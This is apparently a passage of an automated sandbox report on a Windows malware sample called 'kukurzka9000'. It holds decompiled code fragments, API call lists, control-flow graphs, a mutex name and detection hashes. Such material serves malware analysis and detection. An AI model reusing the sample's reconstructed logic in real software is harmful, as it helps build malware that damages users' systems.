                                                                                                                                                                        					_t167 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t308) + _t165);
                                                                                                                                                                        					_v28 = _t167;
                                                                                                                                                                        					_t339 =  *((intOrPtr*)( *0x40e18c))(_t308,  *0x40e20c);
                                                                                                                                                                        					if(_t339 == 0) {
                                                                                                                                                                        						L27:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_v24);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						LocalFree(_t226);
                                                                                                                                                                        						LocalFree(_v28);
                                                                                                                                                                        						goto L40;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t341 = _t339 - _t308 >> 1;
                                                                                                                                                                        					if(E0040A3E4(_t308,  &_v28, 0, _t341) == 0) {
                                                                                                                                                                        						goto L27;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t229 = _t308 + (_t341 + 1) * 2;
                                                                                                                                                                        					_v48 =  *_v28 & 0x0000ffff;
                                                                                                                                                                        					_t309 = 0x40;
                                                                                                                                                                        					_t181 = LocalAlloc(_t309, ??);
                                                                                                                                                                        					_t344 = _t181;
                                                                                                                                                                        					_v36 = _t344;
                                                                                                                                                                        					_t182 =  *((intOrPtr*)( *0x40e18c))(_t229,  *0x40e228,  *((intOrPtr*)( *0x40e08c))(_t229) + _t179);
                                                                                                                                                                        					if(_t182 == 0) {
                                                                                                                                                                        						L26:
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						LocalFree(_v16);
                                                                                                                                                                        						LocalFree(_v24);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						LocalFree(_v32);
                                                                                                                                                                        						LocalFree(_v28);
                                                                                                                                                                        						LocalFree(_t344);
                                                                                                                                                                        						goto L40;
                                                                                                                                                                        					}
                                                                                                                                                                        					if(LoadLibraryExA(0, _t182 - _t229 >> 1, ??) == 0) {
                                                                                                                                                                        						_t344 = _v36;
                                                                                                                                                                        						goto L26;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v40 = _v40 & 0x00000000;
                                                                                                                                                                        					_t194 =  *((intOrPtr*)( *0x40e044))(_t309, 0x28000);
                                                                                                                                                                        					_t345 = _t194;
                                                                                                                                                                        					_v52 = _t345;
                                                                                                                                                                        					_t195 =  *((intOrPtr*)( *0x40e074))(_v24);
                                                                                                                                                                        					_push( &_v40);
                                                                                                                                                                        					_push(_t345);
                                                                                                                                                                        					_t289 = 0x31;
                                                                                                                                                                        					_push(0 | _v48 == _t289);
                                                                                                                                                                        					_push(0 | _v44 == _t289);
                                                                                                                                                                        					_push(_t195);
                                                                                                                                                                        					_push(_v20);
                                                                                                                                                                        					_push(_v16);
                                                                                                                                                                        					_push(_v12);
                                                                                                                                                                        					E00405FEB(_v36, _v8);
                                                                                                                                                                        					_t348 = _t348 + 0x20;
                                                                                                                                                                        					if(_v40 > 0) {
                                                                                                                                                                        						_t209 =  *((intOrPtr*)( *0x40e044))(_t309, 0x208);
                                                                                                                                                                        						_t210 =  *((intOrPtr*)( *0x40e044))(_t309, 0x208);
                                                                                                                                                                        						_t291 = 0x10;
                                                                                                                                                                        						_t211 = E0040A05F(_t209, _t291);
                                                                                                                                                                        						_v48 = _t211;
                                                                                                                                                                        						_t212 =  *((intOrPtr*)( *0x40e13c))(_t210,  *0x40e210);
                                                                                                                                                                        						_t311 = _v48;
                                                                                                                                                                        						_t213 = E0040A503(_t212, _t311);
                                                                                                                                                                        						_t274 =  *0x40e204; // 0x6587d8
                                                                                                                                                                        						_v60 = _v60 & 0x00000000;
                                                                                                                                                                        						_v64 = _t274;
                                                                                                                                                                        						_v48 = _t213;
                                                                                                                                                                        						_t214 = E00408619( &_v48);
                                                                                                                                                                        						_v44 = _t214;
                                                                                                                                                                        						_t347 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        						 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t311, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        						if(0 != 0) {
                                                                                                                                                                        							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t311, 0xffffffff, _t347, 0, 0, 0);
                                                                                                                                                                        							if(0 != 0) {
                                                                                                                                                                        								E00407EDB(_v56, _t347, 0, 0, _v40, _v52, _v44,  &_v64);
                                                                                                                                                                        								_t348 = _t348 + 0x18;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_t347);
                                                                                                                                                                        						LocalFree(_v44);
                                                                                                                                                                        						LocalFree(_v48);
                                                                                                                                                                        						LocalFree(_t311);
                                                                                                                                                                        						_t345 = _v52;
                                                                                                                                                                        					}
                                                                                                                                                                        					LocalFree(_t345);
                                                                                                                                                                        					LocalFree(_v8);
                                                                                                                                                                        					LocalFree(_v12);
                                                                                                                                                                        					LocalFree(_v16);
                                                                                                                                                                        					LocalFree(_v20);
                                                                                                                                                                        					LocalFree(_v24);
                                                                                                                                                                        					LocalFree(_v32);
                                                                                                                                                                        					LocalFree(_v28);
                                                                                                                                                                        					LocalFree(_v36);
                                                                                                                                                                        					_t295 =  *((intOrPtr*)( *0x40e18c))(_t229,  *0x40e250);
                                                                                                                                                                        					if(_t295 != 0) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L41;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				LocalFree(_t226);
                                                                                                                                                                        				goto L40;
                                                                                                                                                                        			}








































































                                                                                                                                                                        0x004055c8
                                                                                                                                                                        0x004055ce
                                                                                                                                                                        0x004055d2
                                                                                                                                                                        0x00405b56
                                                                                                                                                                        0x00405b5a
                                                                                                                                                                        0x00405b5a
                                                                                                                                                                        0x004055da
                                                                                                                                                                        0x004055df
                                                                                                                                                                        0x004055f0
                                                                                                                                                                        0x004055fe
                                                                                                                                                                        0x00405601
                                                                                                                                                                        0x00405606
                                                                                                                                                                        0x0040560a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405615
                                                                                                                                                                        0x00405625
                                                                                                                                                                        0x00405b4a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b4a
                                                                                                                                                                        0x00405639
                                                                                                                                                                        0x00405644
                                                                                                                                                                        0x00405652
                                                                                                                                                                        0x00405655
                                                                                                                                                                        0x0040565a
                                                                                                                                                                        0x0040565e
                                                                                                                                                                        0x00405b45
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00405669
                                                                                                                                                                        0x00405679
                                                                                                                                                                        0x00405b42
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b42
                                                                                                                                                                        0x0040568d
                                                                                                                                                                        0x00405698
                                                                                                                                                                        0x004056a6
                                                                                                                                                                        0x004056a9
                                                                                                                                                                        0x004056ae
                                                                                                                                                                        0x004056b2
                                                                                                                                                                        0x00405b34
                                                                                                                                                                        0x00405b37
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x004056bd
                                                                                                                                                                        0x004056cd
                                                                                                                                                                        0x00405b31
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b31
                                                                                                                                                                        0x004056e1
                                                                                                                                                                        0x004056ec
                                                                                                                                                                        0x004056fa
                                                                                                                                                                        0x004056fd
                                                                                                                                                                        0x00405702
                                                                                                                                                                        0x00405706
                                                                                                                                                                        0x00405b13
                                                                                                                                                                        0x00405b16
                                                                                                                                                                        0x00405b1f
                                                                                                                                                                        0x00405b26
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x00405b54
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b55
                                                                                                                                                                        0x00405711
                                                                                                                                                                        0x00405721
                                                                                                                                                                        0x00405b10
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b10
                                                                                                                                                                        0x00405735
                                                                                                                                                                        0x00405740
                                                                                                                                                                        0x0040574e
                                                                                                                                                                        0x00405751
                                                                                                                                                                        0x00405756
                                                                                                                                                                        0x0040575a
                                                                                                                                                                        0x00405af0
                                                                                                                                                                        0x00405af3
                                                                                                                                                                        0x00405afc
                                                                                                                                                                        0x00405b05
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00405765
                                                                                                                                                                        0x00405775
                                                                                                                                                                        0x00405aed
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405aed
                                                                                                                                                                        0x00405789
                                                                                                                                                                        0x00405794
                                                                                                                                                                        0x004057a2
                                                                                                                                                                        0x004057a5
                                                                                                                                                                        0x004057aa
                                                                                                                                                                        0x004057ae
                                                                                                                                                                        0x00405abe
                                                                                                                                                                        0x00405ac1
                                                                                                                                                                        0x00405aca
                                                                                                                                                                        0x00405ad3
                                                                                                                                                                        0x00405adc
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405ae5
                                                                                                                                                                        0x004057b9
                                                                                                                                                                        0x004057c0
                                                                                                                                                                        0x004057c5
                                                                                                                                                                        0x004057cc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004057de
                                                                                                                                                                        0x004057e1
                                                                                                                                                                        0x004057f1
                                                                                                                                                                        0x00405800
                                                                                                                                                                        0x00405805
                                                                                                                                                                        0x00405809
                                                                                                                                                                        0x00405a82
                                                                                                                                                                        0x00405a85
                                                                                                                                                                        0x00405a8e
                                                                                                                                                                        0x00405a97
                                                                                                                                                                        0x00405aa0
                                                                                                                                                                        0x00405aa9
                                                                                                                                                                        0x00405ab0
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x00405814
                                                                                                                                                                        0x00405824
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405831
                                                                                                                                                                        0x0040583a
                                                                                                                                                                        0x0040584a
                                                                                                                                                                        0x0040584c
                                                                                                                                                                        0x0040585a
                                                                                                                                                                        0x0040585d
                                                                                                                                                                        0x00405860
                                                                                                                                                                        0x00405864
                                                                                                                                                                        0x00405a3d
                                                                                                                                                                        0x00405a40
                                                                                                                                                                        0x00405a49
                                                                                                                                                                        0x00405a52
                                                                                                                                                                        0x00405a5b
                                                                                                                                                                        0x00405a64
                                                                                                                                                                        0x00405a6d
                                                                                                                                                                        0x00405a76
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x0040587f
                                                                                                                                                                        0x00405a3a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405a3a
                                                                                                                                                                        0x0040588a
                                                                                                                                                                        0x00405894
                                                                                                                                                                        0x0040589f
                                                                                                                                                                        0x004058a1
                                                                                                                                                                        0x004058a4
                                                                                                                                                                        0x004058a9
                                                                                                                                                                        0x004058aa
                                                                                                                                                                        0x004058ad
                                                                                                                                                                        0x004058b7
                                                                                                                                                                        0x004058c4
                                                                                                                                                                        0x004058c8
                                                                                                                                                                        0x004058c9
                                                                                                                                                                        0x004058cc
                                                                                                                                                                        0x004058cf
                                                                                                                                                                        0x004058d2
                                                                                                                                                                        0x004058d7
                                                                                                                                                                        0x004058de
                                                                                                                                                                        0x004058ef
                                                                                                                                                                        0x004058ff
                                                                                                                                                                        0x00405903
                                                                                                                                                                        0x00405908
                                                                                                                                                                        0x0040591a
                                                                                                                                                                        0x0040591d
                                                                                                                                                                        0x0040591f
                                                                                                                                                                        0x00405926
                                                                                                                                                                        0x0040592b
                                                                                                                                                                        0x00405931
                                                                                                                                                                        0x00405935
                                                                                                                                                                        0x0040593b
                                                                                                                                                                        0x0040593e
                                                                                                                                                                        0x00405950
                                                                                                                                                                        0x0040595b
                                                                                                                                                                        0x0040596c
                                                                                                                                                                        0x00405970
                                                                                                                                                                        0x00405987
                                                                                                                                                                        0x0040598b
                                                                                                                                                                        0x004059a3
                                                                                                                                                                        0x004059a8
                                                                                                                                                                        0x004059a8
                                                                                                                                                                        0x0040598b
                                                                                                                                                                        0x004059ac
                                                                                                                                                                        0x004059b5
                                                                                                                                                                        0x004059be
                                                                                                                                                                        0x004059c5
                                                                                                                                                                        0x004059cb
                                                                                                                                                                        0x004059cb
                                                                                                                                                                        0x004059cf
                                                                                                                                                                        0x004059d8
                                                                                                                                                                        0x004059e1
                                                                                                                                                                        0x004059ea
                                                                                                                                                                        0x004059f3
                                                                                                                                                                        0x004059fc
                                                                                                                                                                        0x00405a05
                                                                                                                                                                        0x00405a0e
                                                                                                                                                                        0x00405a17
                                                                                                                                                                        0x00405a2b
                                                                                                                                                                        0x00405a2f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405a35
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405a35
                                                                                                                                                                        0x00405a2f
                                                                                                                                                                        0x00405b4e
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 004055F0
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B4E
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00405644
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00405698
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(-00000010), ref: 004056E5
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 004056EC
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00405740
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00405794
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 004057F1
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040584C
                                                                                                                                                                        • LoadLibraryExA.KERNELBASE ref: 00405876
                                                                                                                                                                          • Part of subcall function 00405FEB: lstrlenW.KERNEL32(006584F8,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406137
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004059AC
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059B5
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059BE
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059C5
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004059CF
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF), ref: 004059D8
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059E1
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059EA
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059F3
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004059FC
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00405A05
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00405A0E
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00405A17
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A40
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A49
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A52
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A5B
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A64
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A6D
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A76
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A85
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A8E
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A97
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AA0
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AA9
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AB0
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AC1
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405ACA
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AD3
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405ADC
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AE5
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AF3
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AFC
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B05
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B16
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B1F
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B26
                                                                                                                                                                        • LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B37
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.331137703.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000010.00000002.331335251.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_400000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$Alloc$lstrlen$GlobalLibraryLoadOpen
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 3736288983-1731603023
                                                                                                                                                                        • Opcode ID: acb05a7f8a70a2da554c802db9e5f0e9240b428b10ae7605c4d463cf284dd9f3
                                                                                                                                                                        • Instruction ID: f35946c0f576b0545b5d2f7ca60a1d17271964e093f6211ee75f8335e655f3b5
                                                                                                                                                                        • Opcode Fuzzy Hash: acb05a7f8a70a2da554c802db9e5f0e9240b428b10ae7605c4d463cf284dd9f3
                                                                                                                                                                        • Instruction Fuzzy Hash: E1F1C372900225EFDB149BA6DE48EAEBB75EB48310F044535F905B32A0DB746D21CFA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1538 2396ce3-2396d22 call 239057f CoInitialize call 2399a36 call 239359b 1546 2396d48-2396d5d 1538->1546 1547 2396d24 1538->1547 1551 2396d6a-2396d6c ExitProcess 1546->1551 1552 2396d5f-2396d79 CreateMutexW call 2399632 1546->1552 1548 2396d29-2396d3b 1547->1548 1548->1546 1553 2396d3d-2396d46 1548->1553 1557 2396d7b call 2399772 1552->1557 1558 2396d80-2396e98 call 2399547 * 5 call 2397b8d call 2399b6e call 2399be6 call 2399a77 * 5 1552->1558 1553->1546 1553->1548 1557->1558 1594 2396e9b-2396eb5 call 2399a36 1558->1594 1598 2396ec5-2396ee8 call 23971d6 1594->1598 1599 2396eb7-2396ec3 call 2399a77 1594->1599 1605 2396f09-2396f12 1598->1605 1606 2396eea-2396ef2 1598->1606 1599->1598 1611 2396f1a-2396f47 call 23997be 1605->1611 1609 2396efb-2396f05 1606->1609 1610 2396ef4 1606->1610 1609->1594 1612 2396f07 1609->1612 1610->1609 1618 23971b9-23971cb ExitProcess 1611->1618 1619 2396f4d-2396f69 call 2397bc0 1611->1619 1612->1611 1625 2396f6b-2396fa7 call 2399958 1619->1625 1626 2396f73-2396f75 ExitProcess 1619->1626 1632 2396fa9-2396fab ExitProcess 1625->1632 1633 2396fb1-23970a1 call 2399a77 * 5 SetCurrentDirectoryW GetEnvironmentVariableW call 2399a77 * 2 SetEnvironmentVariableW call 2398e7a 1625->1633 1658 23970ae-23970bf 1633->1658 1659 23970a3-23970ad call 2393511 1633->1659 1663 2397108-2397159 call 2399d4e call 239a14c call 2394b2a call 239914d call 23944f2 call 2397fb6 1658->1663 1664 23970c1-23970e9 SHGetSpecialFolderPathW call 2395b4c 1658->1664 1659->1658 1687 239715b-239715f call 2398051 1663->1687 1688 2397164-2397179 call 239693b 1663->1688 1673 23970eb-23970fc call 23958b2 1664->1673 1674 23970fe 1664->1674 1677 2397101 1673->1677 1674->1677 1677->1663 1687->1688 1693 239717b-239717c FreeLibrary 1688->1693 1694 2397182-2397198 DeleteFileW 1688->1694 1693->1694 1696 239719a-239719b FreeLibrary 1694->1696 1697 23971a1-23971b2 DeleteFileW 1694->1697 1696->1697 1697->1618
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0239057F: LoadLibraryW.KERNEL32(0040C040), ref: 0239058A
                                                                                                                                                                          • Part of subcall function 0239057F: LoadLibraryW.KERNEL32(0040C114), ref: 0239061E
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 02396CF7
                                                                                                                                                                          • Part of subcall function 02399A36: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,00000000,00000000), ref: 02399A65
                                                                                                                                                                        • CreateMutexW.KERNEL32(00000000,00000000,iqroq5112542785672901323), ref: 02396D62
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 02396D6C
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396E71
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396E78
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396E7F
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396EEA
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396EF5
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 02396F14
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396F1D
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 02396F26
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 02396F75
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 02396FAB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$ExitProcess$LibraryLoad$ByteCharCreateInitializeMultiMutexWide
                                                                                                                                                                        • String ID: $ $ $ $afb5c633c4650f69312baef49db9dfa4$iqroq5112542785672901323$pXet
                                                                                                                                                                        • API String ID: 1864685469-3850438040
                                                                                                                                                                        • Opcode ID: c558d2bf8f2b5ab25cdbf621f3a43ffca48a0fa9f05b2738d3e56535cb160897
                                                                                                                                                                        • Instruction ID: 697a618f6517d6736f6d7c0c4d819f0d95c4a08439d0a4fef23f6895b4f091e3
                                                                                                                                                                        • Opcode Fuzzy Hash: c558d2bf8f2b5ab25cdbf621f3a43ffca48a0fa9f05b2738d3e56535cb160897
                                                                                                                                                                        • Instruction Fuzzy Hash: ABD19571E00214ABDF14ABB6DE49A6E77BAEF49300F004839E916B7390DF749D118F69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1699 2394b2a-2394b46 1701 23950ca-23950ce 1699->1701 1702 2394b4c-2394b4d 1699->1702 1703 2394b4e-2394b7e 1702->1703 1707 23950c1 1703->1707 1708 2394b84-2394b99 call 2399958 1703->1708 1709 23950c2 1707->1709 1713 2394b9f-2394bd2 1708->1713 1714 23950be 1708->1714 1712 23950c8-23950c9 1709->1712 1712->1701 1718 23950b9-23950bc 1713->1718 1719 2394bd8-2394bed call 2399958 1713->1719 1714->1707 1720 2395059-239505f 1718->1720 1723 2394bf3-2394c26 1719->1723 1724 23950b6 1719->1724 1720->1707 1729 23950a8-23950b4 1723->1729 1730 2394c2c-2394c41 call 2399958 1723->1730 1724->1718 1729->1720 1734 23950a5 1730->1734 1735 2394c47-2394c7a 1730->1735 1734->1729 1739 2394c80-2394c95 call 2399958 1735->1739 1740 2395087-23950a3 1735->1740 1744 2394c9b-2394cce 1739->1744 1745 2395084 1739->1745 1740->1709 1751 2395064-2395082 1744->1751 1752 2394cd4-2394ce9 call 2399958 1744->1752 1745->1740 1751->1720 1756 2394cef-2394d22 1752->1756 1757 2395061 1752->1757 1763 2394d28-2394d40 call 2399958 1756->1763 1764 2395032-2395056 1756->1764 1757->1751 1763->1764 1768 2394d46-2394d7d 1763->1768 1764->1720 1775 2394d83-2394d98 call 2399958 1768->1775 1776 2394ff6-239502d 1768->1776 1775->1776 1780 2394d9e-2394dd8 1775->1780 1776->1709 1787 2394dde-2394df3 call 2399958 1780->1787 1788 2394fb1-2394ff1 1780->1788 1794 2394df9-2394e52 call 239555f 1787->1794 1795 2394fae 1787->1795 1788->1709 1803 2394e58-2394ee4 call 23995d3 call 2399a77 call 2397b8d 1794->1803 1804 2394f42-2394fa3 1794->1804 1795->1788 1827 2394f1f-2394f3f 1803->1827 1828 2394ee6-2394eff 1803->1828 1804->1703 1835 2394fa9 1804->1835 1827->1804 1828->1827 1832 2394f01-2394f15 1828->1832 1834 2394f17 call 239744f 1832->1834 1837 2394f1c 1834->1837 1835->1712 1837->1827
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000010.00000002.334709383.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_16_2_2390000_kukurzka9000.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Local$Global
                                                                                                                                                                        • String ID: pXet
                                                                                                                                                                        • API String ID: 67877634-1731603023
                                                                                                                                                                        • Opcode ID: 0f12c4ef2a00073fdc66328a61890da27d8bcc0520ef2ea85460475b67c8d6ed
                                                                                                                                                                        • Instruction ID: be258eacd5484dc8b9ca232efb59ae949bf5539d2bef713e1d3c20f6d570e7b6
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f12c4ef2a00073fdc66328a61890da27d8bcc0520ef2ea85460475b67c8d6ed
                                                                                                                                                                        • Instruction Fuzzy Hash: 8EF1D972900225EFDF159BA6DE48EBEBB75EF45310F044424FA05B72A0CB705D61CBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
